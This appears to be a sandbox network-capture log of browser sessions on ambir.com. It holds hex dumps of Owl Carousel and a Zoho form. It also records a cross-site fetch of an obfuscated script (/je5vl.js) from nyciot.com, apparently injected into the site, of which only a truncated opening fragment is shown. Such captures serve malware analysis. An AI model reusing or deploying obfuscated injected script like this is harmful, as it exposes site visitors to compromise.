                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:20 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Tue, 03 Oct 2023 15:58:06 GMT
                                                                                                                                                                                              ETag: W/"651c3a0e-ad36"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13808
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f9388b27d16-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:20 UTC878INData Raw: 37 64 63 36 0d 0a 2f 2a 2a 0a 20 2a 20 4f 77 6c 20 43 61 72 6f 75 73 65 6c 20 76 32 2e 33 2e 34 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 33 2d 32 30 31 38 20 44 61 76 69 64 20 44 65 75 74 73 63 68 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 3a 20 53 45 45 20 4c 49 43 45 4e 53 45 20 49 4e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4f 77 6c 43 61 72 6f 75 73 65 6c 32 2f 4f 77 6c 43 61 72 6f 75 73 65 6c 32 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 62 2c 63 29 7b 74 68 69 73 2e 73 65 74 74 69 6e 67 73 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 61 2e 65 78 74 65 6e 64 28 7b 7d 2c 65 2e 44
                                                                                                                                                                                              Data Ascii: 7dc6/** * Owl Carousel v2.3.4 * Copyright 2013-2018 David Deutsch * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE */!function(a,b,c,d){function e(b,c){this.settings=null,this.options=a.extend({},e.D
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 73 2e 5f 70 6c 75 67 69 6e 73 5b 61 2e 63 68 61 72 41 74 28 30 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 61 2e 73 6c 69 63 65 28 31 29 5d 3d 6e 65 77 20 62 28 74 68 69 73 29 7d 2c 74 68 69 73 29 29 2c 61 2e 65 61 63 68 28 65 2e 57 6f 72 6b 65 72 73 2c 61 2e 70 72 6f 78 79 28 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 74 68 69 73 2e 5f 70 69 70 65 2e 70 75 73 68 28 7b 66 69 6c 74 65 72 3a 63 2e 66 69 6c 74 65 72 2c 72 75 6e 3a 61 2e 70 72 6f 78 79 28 63 2e 72 75 6e 2c 74 68 69 73 29 7d 29 7d 2c 74 68 69 73 29 29 2c 74 68 69 73 2e 73 65 74 75 70 28 29 2c 74 68 69 73 2e 69 6e 69 74 69 61 6c 69 7a 65 28 29 7d 65 2e 44 65 66 61 75 6c 74 73 3d 7b 69 74 65 6d 73 3a 33 2c 6c 6f 6f 70 3a 21 31 2c 63 65 6e 74 65 72 3a 21 31 2c 72 65 77 69 6e 64 3a 21 31 2c 63
                                                                                                                                                                                              Data Ascii: s._plugins[a.charAt(0).toLowerCase()+a.slice(1)]=new b(this)},this)),a.each(e.Workers,a.proxy(function(b,c){this._pipe.push({filter:c.filter,run:a.proxy(c.run,this)})},this)),this.setup(),this.initialize()}e.Defaults={items:3,loop:!1,center:!1,rewind:!1,c
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 2e 73 65 74 74 69 6e 67 73 2e 61 75 74 6f 57 69 64 74 68 2c 64 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 72 74 6c 2c 65 3d 7b 77 69 64 74 68 3a 22 61 75 74 6f 22 2c 22 6d 61 72 67 69 6e 2d 6c 65 66 74 22 3a 64 3f 62 3a 22 22 2c 22 6d 61 72 67 69 6e 2d 72 69 67 68 74 22 3a 64 3f 22 22 3a 62 7d 3b 21 63 26 26 74 68 69 73 2e 24 73 74 61 67 65 2e 63 68 69 6c 64 72 65 6e 28 29 2e 63 73 73 28 65 29 2c 61 2e 63 73 73 3d 65 7d 7d 2c 7b 66 69 6c 74 65 72 3a 5b 22 77 69 64 74 68 22 2c 22 69 74 65 6d 73 22 2c 22 73 65 74 74 69 6e 67 73 22 5d 2c 72 75 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 28 74 68 69 73 2e 77 69 64 74 68 28 29 2f 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 69 74 65 6d 73 29 2e 74 6f 46 69 78 65 64 28 33 29 2d 74 68 69 73 2e 73
                                                                                                                                                                                              Data Ascii: .settings.autoWidth,d=this.settings.rtl,e={width:"auto","margin-left":d?b:"","margin-right":d?"":b};!c&&this.$stage.children().css(e),a.css=e}},{filter:["width","items","settings"],run:function(a){var b=(this.width()/this.settings.items).toFixed(3)-this.s
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 64 74 68 3a 4d 61 74 68 2e 63 65 69 6c 28 4d 61 74 68 2e 61 62 73 28 62 5b 62 2e 6c 65 6e 67 74 68 2d 31 5d 29 29 2b 32 2a 61 2c 22 70 61 64 64 69 6e 67 2d 6c 65 66 74 22 3a 61 7c 7c 22 22 2c 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 22 3a 61 7c 7c 22 22 7d 3b 74 68 69 73 2e 24 73 74 61 67 65 2e 63 73 73 28 63 29 7d 7d 2c 7b 66 69 6c 74 65 72 3a 5b 22 77 69 64 74 68 22 2c 22 69 74 65 6d 73 22 2c 22 73 65 74 74 69 6e 67 73 22 5d 2c 72 75 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 68 69 73 2e 5f 63 6f 6f 72 64 69 6e 61 74 65 73 2e 6c 65 6e 67 74 68 2c 63 3d 21 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 61 75 74 6f 57 69 64 74 68 2c 64 3d 74 68 69 73 2e 24 73 74 61 67 65 2e 63 68 69 6c 64 72 65 6e 28 29 3b 69 66 28 63 26 26 61 2e 69 74 65
                                                                                                                                                                                              Data Ascii: dth:Math.ceil(Math.abs(b[b.length-1]))+2*a,"padding-left":a||"","padding-right":a||""};this.$stage.css(c)}},{filter:["width","items","settings"],run:function(a){var b=this._coordinates.length,c=!this.settings.autoWidth,d=this.$stage.children();if(c&&a.ite
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 67 65 2e 63 68 69 6c 64 72 65 6e 28 29 2e 65 71 28 74 68 69 73 2e 63 75 72 72 65 6e 74 28 29 29 2e 61 64 64 43 6c 61 73 73 28 22 63 65 6e 74 65 72 22 29 7d 7d 5d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 69 74 69 61 6c 69 7a 65 53 74 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 24 73 74 61 67 65 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 22 2e 22 2b 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 73 74 61 67 65 43 6c 61 73 73 29 2c 74 68 69 73 2e 24 73 74 61 67 65 2e 6c 65 6e 67 74 68 7c 7c 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 64 64 43 6c 61 73 73 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 69 6e 67 43 6c 61 73 73 29 2c 74 68 69 73 2e 24 73 74 61 67 65 3d 61 28 22 3c 22 2b 74 68 69 73 2e 73 65 74 74 69 6e
                                                                                                                                                                                              Data Ascii: ge.children().eq(this.current()).addClass("center")}}],e.prototype.initializeStage=function(){this.$stage=this.$element.find("."+this.settings.stageClass),this.$stage.length||(this.$element.addClass(this.options.loadingClass),this.$stage=a("<"+this.settin
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 64 22 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 63 68 65 63 6b 56 69 73 69 62 69 6c 69 74 79 7c 7c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 75 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 74 68 69 73 2e 76 69 65 77 70 6f 72 74 28 29 2c 63 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 73 70 6f 6e 73 69 76 65 2c 64 3d 2d 31 2c 65 3d 6e 75 6c 6c 3b 63 3f 28 61 2e 65 61 63 68 28 63 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3c 3d 62 26 26 61 3e 64 26 26 28 64 3d 4e 75 6d 62 65 72 28 61 29 29 7d 29 2c 65 3d 61 2e 65 78 74 65 6e
                                                                                                                                                                                              Data Ascii: d")},e.prototype.isVisible=function(){return!this.settings.checkVisibility||this.$element.is(":visible")},e.prototype.setup=function(){var b=this.viewport(),c=this.options.responsive,d=-1,e=null;c?(a.each(c,function(a){a<=b&&a>d&&(d=Number(a))}),e=a.exten
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 22 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 77 69 64 74 68 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 73 77 69 74 63 68 28 61 3d 61 7c 7c 65 2e 57 69 64 74 68 2e 44 65 66 61 75 6c 74 29 7b 63 61 73 65 20 65 2e 57 69 64 74 68 2e 49 6e 6e 65 72 3a 63 61 73 65 20 65 2e 57 69 64 74 68 2e 4f 75 74 65 72 3a 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 77 69 64 74 68 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 77 69 64 74 68 2d 32 2a 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 73 74 61 67 65 50 61 64 64 69 6e 67 2b 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6d 61 72 67 69 6e 7d 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 66 72 65 73 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 65 6e 74 65 72 28 22 72 65 66 72 65 73 68 69 6e 67 22 29 2c
                                                                                                                                                                                              Data Ascii: ")},e.prototype.width=function(a){switch(a=a||e.Width.Default){case e.Width.Inner:case e.Width.Outer:return this._width;default:return this._width-2*this.settings.stagePadding+this.settings.margin}},e.prototype.refresh=function(){this.enter("refreshing"),
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 2e 63 6f 72 65 20 73 65 6c 65 63 74 73 74 61 72 74 2e 6f 77 6c 2e 63 6f 72 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 31 7d 29 29 2c 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 74 6f 75 63 68 44 72 61 67 26 26 28 74 68 69 73 2e 24 73 74 61 67 65 2e 6f 6e 28 22 74 6f 75 63 68 73 74 61 72 74 2e 6f 77 6c 2e 63 6f 72 65 22 2c 61 2e 70 72 6f 78 79 28 74 68 69 73 2e 6f 6e 44 72 61 67 53 74 61 72 74 2c 74 68 69 73 29 29 2c 74 68 69 73 2e 24 73 74 61 67 65 2e 6f 6e 28 22 74 6f 75 63 68 63 61 6e 63 65 6c 2e 6f 77 6c 2e 63 6f 72 65 22 2c 61 2e 70 72 6f 78 79 28 74 68 69 73 2e 6f 6e 44 72 61 67 45 6e 64 2c 74 68 69 73 29 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 44 72 61 67 53 74 61 72 74 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72
                                                                                                                                                                                              Data Ascii: .core selectstart.owl.core",function(){return!1})),this.settings.touchDrag&&(this.$stage.on("touchstart.owl.core",a.proxy(this.onDragStart,this)),this.$stage.on("touchcancel.owl.core",a.proxy(this.onDragEnd,this)))},e.prototype.onDragStart=function(b){var
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 65 6e 63 65 28 74 68 69 73 2e 5f 64 72 61 67 2e 70 6f 69 6e 74 65 72 2c 74 68 69 73 2e 70 6f 69 6e 74 65 72 28 61 29 29 2c 66 3d 74 68 69 73 2e 64 69 66 66 65 72 65 6e 63 65 28 74 68 69 73 2e 5f 64 72 61 67 2e 73 74 61 67 65 2e 73 74 61 72 74 2c 65 29 3b 74 68 69 73 2e 69 73 28 22 64 72 61 67 67 69 6e 67 22 29 26 26 28 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6c 6f 6f 70 3f 28 62 3d 74 68 69 73 2e 63 6f 6f 72 64 69 6e 61 74 65 73 28 74 68 69 73 2e 6d 69 6e 69 6d 75 6d 28 29 29 2c 63 3d 74 68 69 73 2e 63 6f 6f 72 64 69 6e 61 74 65 73 28 74 68 69 73 2e 6d 61 78 69 6d 75 6d 28 29 2b 31 29 2d 62 2c 66 2e 78 3d 28 28 66 2e 78 2d 62 29 25 63 2b 63 29 25 63 2b 62 29 3a 28 62 3d 74 68 69 73 2e 73 65 74 74
                                                                                                                                                                                              Data Ascii: ence(this._drag.pointer,this.pointer(a)),f=this.difference(this._drag.stage.start,e);this.is("dragging")&&(a.preventDefault(),this.settings.loop?(b=this.coordinates(this.minimum()),c=this.coordinates(this.maximum()+1)-b,f.x=((f.x-b)%c+c)%c+b):(b=this.sett
                                                                                                                                                                                              2024-11-20 20:28:20 UTC1369INData Raw: 26 26 62 3e 69 2d 66 26 26 62 3c 69 2b 66 3f 65 3d 61 3a 22 72 69 67 68 74 22 3d 3d 3d 63 26 26 62 3e 69 2d 67 2d 66 26 26 62 3c 69 2d 67 2b 66 3f 65 3d 61 2b 31 3a 74 68 69 73 2e 6f 70 28 62 2c 22 3c 22 2c 69 29 26 26 74 68 69 73 2e 6f 70 28 62 2c 22 3e 22 2c 68 5b 61 2b 31 5d 21 3d 3d 64 3f 68 5b 61 2b 31 5d 3a 69 2d 67 29 26 26 28 65 3d 22 6c 65 66 74 22 3d 3d 3d 63 3f 61 2b 31 3a 61 29 2c 2d 31 3d 3d 3d 65 7d 2c 74 68 69 73 29 29 2c 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6c 6f 6f 70 7c 7c 28 74 68 69 73 2e 6f 70 28 62 2c 22 3e 22 2c 68 5b 74 68 69 73 2e 6d 69 6e 69 6d 75 6d 28 29 5d 29 3f 65 3d 62 3d 74 68 69 73 2e 6d 69 6e 69 6d 75 6d 28 29 3a 74 68 69 73 2e 6f 70 28 62 2c 22 3c 22 2c 68 5b 74 68 69 73 2e 6d 61 78 69 6d 75 6d 28 29 5d 29 26 26 28
                                                                                                                                                                                              Data Ascii: &&b>i-f&&b<i+f?e=a:"right"===c&&b>i-g-f&&b<i-g+f?e=a+1:this.op(b,"<",i)&&this.op(b,">",h[a+1]!==d?h[a+1]:i-g)&&(e="left"===c?a+1:a),-1===e},this)),this.settings.loop||(this.op(b,">",h[this.minimum()])?e=b=this.minimum():this.op(b,"<",h[this.maximum()])&&(


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              31192.168.2.54975345.61.136.1964431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:20 UTC511OUTGET /je5vl.js HTTP/1.1
                                                                                                                                                                                              Host: nyciot.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:21 UTC261INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:20 GMT
                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: max-age=604800, public
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Content-Length: 5847
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              2024-11-20 20:28:21 UTC5847INData Raw: 20 0d 0a 76 61 72 20 5f 30 78 35 39 36 33 31 31 3d 5f 30 78 63 32 66 32 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 65 34 62 30 61 2c 5f 30 78 38 32 31 38 62 29 7b 76 61 72 20 5f 30 78 33 34 31 63 35 39 3d 5f 30 78 63 32 66 32 2c 5f 30 78 33 38 38 65 63 39 3d 5f 30 78 32 65 34 62 30 61 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 33 32 65 33 63 35 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 34 31 63 35 39 28 30 78 32 30 32 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 34 31 63 35 39 28 30 78 32 31 32 29 29 2f 30 78 32 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 34 31 63 35 39 28 30 78 31 66 62 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 34 31 63 35 39 28 30 78 32 31 38 29 29 2f 30 78 34
                                                                                                                                                                                              Data Ascii: var _0x596311=_0xc2f2;(function(_0x2e4b0a,_0x8218b){var _0x341c59=_0xc2f2,_0x388ec9=_0x2e4b0a();while(!![]){try{var _0x32e3c5=parseInt(_0x341c59(0x202))/0x1+-parseInt(_0x341c59(0x212))/0x2+parseInt(_0x341c59(0x1fb))/0x3*(-parseInt(_0x341c59(0x218))/0x4


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              32192.168.2.549756136.143.182.974431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:20 UTC768OUTGET /ambirtech/form/ScannerBrochureDownload/formperma/Ariy9HGiAVXh5JfOrGqqgQZdZYr8pgPgm4tTdrChjcU HTTP/1.1
                                                                                                                                                                                              Host: forms.zohopublic.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:20 UTC367INHTTP/1.1 200
                                                                                                                                                                                              Server: ZGS
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:20 GMT
                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: zalb_383aeadb58=09c5710d399dc09aa2aecb5e82cb2421; Path=/; Secure; HttpOnly
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                              Content-Language: en-US
                                                                                                                                                                                              Strict-Transport-Security: max-age=63072000
                                                                                                                                                                                              2024-11-20 20:28:20 UTC16017INData Raw: 31 66 33 32 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 20 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                              Data Ascii: 1f32<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <meta http-equiv="x-ua-compatible" content="IE=edge" /><html xmlns="http://www.w3.org/1999/xhtml"><meta http-equiv="Content-
                                                                                                                                                                                              2024-11-20 20:28:21 UTC16384INData Raw: 72 74 61 6e 74 3b 20 7d 2e 74 65 6d 70 53 75 62 66 72 6d 57 72 61 70 70 65 72 20 2e 65 72 72 6f 72 20 2e 74 65 6d 70 43 6f 6e 74 44 69 76 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 68 6f 76 65 72 2c 20 2e 74 65 6d 70 53 75 62 66 72 6d 57 72 61 70 70 65 72 20 2e 65 72 72 6f 72 20 2e 74 65 6d 70 43 6f 6e 74 44 69 76 20 74 65 78 74 61 72 65 61 3a 68 6f 76 65 72 2c 20 2e 74 65 6d 70 53 75 62 66 72 6d 57 72 61 70 70 65 72 20 2e 65 72 72 6f 72 20 2e 74 65 6d 70 43 6f 6e 74 44 69 76 20 2e 66 6f 72 6d 5f 73 42 6f 78 3a 68 6f 76 65 72 2c 20 2e 74 65 6d 70 53 75 62 66 72 6d 57 72 61 70 70 65 72 20 2e 65 72 72 6f 72 31 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 68 6f 76 65 72 2c 20 2e 74 65 6d 70 53 75 62 66 72 6d 57 72 61 70 70 65
                                                                                                                                                                                              Data Ascii: rtant; }.tempSubfrmWrapper .error .tempContDiv input[type="text"]:hover, .tempSubfrmWrapper .error .tempContDiv textarea:hover, .tempSubfrmWrapper .error .tempContDiv .form_sBox:hover, .tempSubfrmWrapper .error1 input[type="text"]:hover, .tempSubfrmWrappe
                                                                                                                                                                                              2024-11-20 20:28:21 UTC16384INData Raw: 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 20 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 2d 74 6f 70 6c 65 66 74 3a 20 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 20 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 20 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 2d 74 6f 70 72 69 67 68 74 3a 20 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 20 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b
                                                                                                                                                                                              Data Ascii: der-top-left-radius: 0px !important; -moz-border-radius-topleft: 0px !important; border-top-left-radius: 0px !important; -webkit-border-top-right-radius: 0px !important; -moz-border-radius-topright: 0px !important; border-top-right-radius: 0px !important;
                                                                                                                                                                                              2024-11-20 20:28:21 UTC16384INData Raw: 2c 0a 22 63 68 6f 6f 73 65 76 61 6c 22 3a 22 43 68 6f 6f 73 65 5c 78 32 30 61 5c 78 32 30 72 61 74 69 6e 67 5c 78 32 30 6f 6e 5c 78 32 30 74 68 69 73 5c 78 32 30 73 63 61 6c 65 2e 22 2c 0a 22 73 65 6c 65 63 74 22 3a 22 5c 78 32 44 53 65 6c 65 63 74 5c 78 32 44 22 2c 0a 22 77 72 6f 6e 67 76 65 72 69 66 69 63 61 74 69 6f 6e 63 6f 64 65 22 3a 22 54 68 61 74 5c 78 32 30 43 41 50 54 43 48 41 5c 78 32 30 77 61 73 5c 78 32 30 69 6e 63 6f 72 72 65 63 74 2e 5c 78 32 30 22 2c 0a 22 69 6e 63 6f 6d 70 6c 65 74 65 69 6e 70 75 74 74 69 6d 65 22 3a 22 45 6e 74 65 72 5c 78 32 30 74 69 6d 65 5c 78 32 30 69 6e 5c 78 32 30 5c 78 32 38 48 48 5c 78 33 41 4d 4d 5c 78 32 30 41 4d 5c 78 32 46 50 4d 5c 78 32 39 5c 78 32 30 66 6f 72 6d 61 74 2e 22 2c 0a 22 69 6e 63 6f 6d 70 6c 65
                                                                                                                                                                                              Data Ascii: ,"chooseval":"Choose\x20a\x20rating\x20on\x20this\x20scale.","select":"\x2DSelect\x2D","wrongverificationcode":"That\x20CAPTCHA\x20was\x20incorrect.\x20","incompleteinputtime":"Enter\x20time\x20in\x20\x28HH\x3AMM\x20AM\x2FPM\x29\x20format.","incomple
